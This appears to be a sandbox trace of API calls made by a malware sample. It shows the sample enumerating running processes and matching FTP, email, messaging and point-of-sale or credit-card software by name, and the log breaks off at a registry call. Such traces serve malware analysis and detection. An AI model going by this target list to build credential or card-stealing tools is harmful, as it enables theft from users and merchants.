[0097.735] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.737] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x3e0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="shouldmake.exe") returned 0xe [0097.737] CloseHandle (hObject=0x4ec) returned 1 [0097.737] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x4ec [0097.737] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.738] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x12c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="water.exe") returned 0x9 [0097.739] CloseHandle (hObject=0x4ec) returned 1 [0097.739] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa00) returned 0x4ec [0097.739] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.740] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xbe0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="plant.exe") returned 0x9 [0097.740] CloseHandle (hObject=0x4ec) returned 1 [0097.741] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb60) returned 0x4ec [0097.741] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.742] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xd50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0097.742] CloseHandle (hObject=0x4ec) returned 1 [0097.742] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb68) returned 0x4ec [0097.742] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.744] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x12f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0097.744] CloseHandle (hObject=0x4ec) returned 1 [0097.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb70) returned 0x4ec [0097.744] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.746] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x1a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0097.746] CloseHandle (hObject=0x4ec) returned 1 [0097.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb78) returned 0x4ec [0097.746] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.748] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xd60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0097.748] CloseHandle (hObject=0x4ec) returned 1 [0097.748] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb80) returned 0x4ec [0097.748] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.750] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x10a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0097.750] CloseHandle (hObject=0x4ec) returned 1 [0097.750] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb88) returned 0x4ec [0097.750] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.752] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xa60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0097.752] CloseHandle (hObject=0x4ec) returned 1 [0097.752] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbbc) returned 0x4ec [0097.752] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.754] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x830000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0097.754] CloseHandle (hObject=0x4ec) returned 1 [0097.754] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc4) returned 0x4ec [0097.754] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.755] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x1260000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0097.756] CloseHandle (hObject=0x4ec) returned 1 [0097.756] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbcc) returned 0x4ec [0097.756] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.757] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x2b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0097.758] CloseHandle (hObject=0x4ec) returned 1 [0097.758] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd4) returned 0x4ec [0097.758] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.759] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xba0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0097.760] CloseHandle (hObject=0x4ec) returned 1 [0097.760] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbdc) returned 0x4ec [0097.760] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.761] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xd00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0097.761] CloseHandle (hObject=0x4ec) returned 1 [0097.762] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe4) returned 0x4ec [0097.762] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.764] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xa20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0097.765] CloseHandle (hObject=0x4ec) returned 1 [0097.765] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbec) returned 0x4ec [0097.765] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.766] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xdf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0097.767] CloseHandle (hObject=0x4ec) returned 1 [0097.767] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf4) returned 0x4ec [0097.767] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.768] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x950000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0097.769] CloseHandle (hObject=0x4ec) returned 1 [0097.769] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbfc) returned 0x4ec [0097.769] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.770] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x850000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0097.770] CloseHandle (hObject=0x4ec) returned 1 [0097.770] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x67c) returned 0x4ec [0097.770] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.771] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x1290000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0097.772] CloseHandle (hObject=0x4ec) returned 1 [0097.772] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd0) returned 0x4ec [0097.772] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.773] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x320000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0097.773] CloseHandle (hObject=0x4ec) returned 1 [0097.773] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4dc) returned 0x4ec [0097.773] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.774] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xee0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0097.775] CloseHandle (hObject=0x4ec) returned 1 [0097.775] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x554) returned 0x4ec [0097.775] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.776] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x260000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0097.776] CloseHandle (hObject=0x4ec) returned 1 [0097.776] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x4ec [0097.776] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.778] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xbd0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0097.778] CloseHandle (hObject=0x4ec) returned 1 [0097.778] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x4ec [0097.778] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.779] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x1170000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0097.779] CloseHandle (hObject=0x4ec) returned 1 [0097.779] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b4) returned 0x4ec [0097.779] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.781] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xf60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0097.781] CloseHandle (hObject=0x4ec) returned 1 [0097.781] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x908) returned 0x4ec [0097.781] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.782] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xaf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0097.782] CloseHandle (hObject=0x4ec) returned 1 [0097.782] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x910) returned 0x4ec [0097.782] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.784] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x13b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0097.784] CloseHandle (hObject=0x4ec) returned 1 [0097.784] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x918) returned 0x4ec [0097.784] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.785] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x13b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0097.785] CloseHandle (hObject=0x4ec) returned 1 [0097.785] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x4ec [0097.785] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.787] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x8d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0097.787] CloseHandle (hObject=0x4ec) returned 1 [0097.787] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x4ec [0097.787] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.788] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x9c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0097.789] CloseHandle (hObject=0x4ec) returned 1 [0097.789] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x4ec [0097.789] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.790] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xe90000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0097.790] CloseHandle (hObject=0x4ec) returned 1 [0097.790] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x940) returned 0x4ec [0097.790] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.792] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xbb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0097.792] CloseHandle (hObject=0x4ec) returned 1 [0097.792] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x938) returned 0x4ec [0097.792] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.793] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x1060000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0097.793] CloseHandle (hObject=0x4ec) returned 1 [0097.794] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa70) returned 0x4ec [0097.794] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.795] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x210000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0097.795] CloseHandle (hObject=0x4ec) returned 1 [0097.795] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa78) returned 0x4ec [0097.795] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.796] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x3f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0097.797] CloseHandle (hObject=0x4ec) returned 1 [0097.797] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0c) returned 0x4ec [0097.797] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.798] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xc20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0097.798] CloseHandle (hObject=0x4ec) returned 1 [0097.798] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc14) returned 0x4ec [0097.798] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.799] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x960000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0097.800] CloseHandle (hObject=0x4ec) returned 1 [0097.800] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc20) returned 0x4ec [0097.800] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.801] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xa10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0097.801] CloseHandle (hObject=0x4ec) returned 1 [0097.801] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc28) returned 0x4ec [0097.801] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.802] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x1b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0097.803] CloseHandle (hObject=0x4ec) returned 1 [0097.803] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc30) returned 0x4ec [0097.803] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.804] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x12f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0097.804] CloseHandle (hObject=0x4ec) returned 1 [0097.804] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc38) returned 0x4ec [0097.804] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.805] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xef0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0097.806] CloseHandle (hObject=0x4ec) returned 1 [0097.806] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc40) returned 0x4ec [0097.806] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.807] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xe00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0097.807] CloseHandle (hObject=0x4ec) returned 1 [0097.807] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc48) returned 0x4ec [0097.807] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.808] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xd70000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0097.809] CloseHandle (hObject=0x4ec) returned 1 [0097.809] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc50) returned 0x4ec [0097.809] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.810] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x240000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0097.810] CloseHandle (hObject=0x4ec) returned 1 [0097.810] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc58) returned 0x4ec [0097.810] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.812] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xdc0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0097.812] CloseHandle (hObject=0x4ec) returned 1 [0097.812] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc60) returned 0x4ec [0097.812] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.821] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x960000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0097.821] CloseHandle (hObject=0x4ec) returned 1 [0097.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc88) returned 0x4ec [0097.821] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.822] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xd20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="realizechoice.exe") returned 0x11 [0097.823] CloseHandle (hObject=0x4ec) returned 1 [0097.823] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc90) returned 0x4ec [0097.823] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.824] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xe20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="victim.exe") returned 0xa [0097.824] CloseHandle (hObject=0x4ec) returned 1 [0097.824] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc98) returned 0x4ec [0097.824] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.826] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xed0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="store-unit-evidence.exe") returned 0x17 [0097.826] CloseHandle (hObject=0x4ec) returned 1 [0097.826] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xca0) returned 0x4ec [0097.826] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.827] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xe30000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="second-blue-population.exe") returned 0x1a [0097.828] CloseHandle (hObject=0x4ec) returned 1 [0097.828] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xca8) returned 0x4ec [0097.828] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.829] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x1350000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="message price.exe") returned 0x11 [0097.829] CloseHandle (hObject=0x4ec) returned 1 [0097.829] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xcbc) returned 0x0 [0097.829] CloseHandle (hObject=0x0) returned 0 [0097.829] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe84) returned 0x0 [0097.829] CloseHandle (hObject=0x0) returned 0 [0097.829] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf64) returned 0x4ec [0097.829] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.830] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x400000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned 0x44 [0097.831] CloseHandle (hObject=0x4ec) returned 1 [0097.836] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x28) returned 0x699ec0 [0097.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x6ac018 [0097.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ad4c10 [0097.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ae0af8 [0097.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2af0ec0 [0097.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ae2270 [0097.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2aa8b30 [0097.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2aa8d98 [0097.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2aa0f20 [0097.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2aa1188 [0097.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2aa13f0 [0097.843] RegOpenKeyExW (in: hKey=0x80000001, 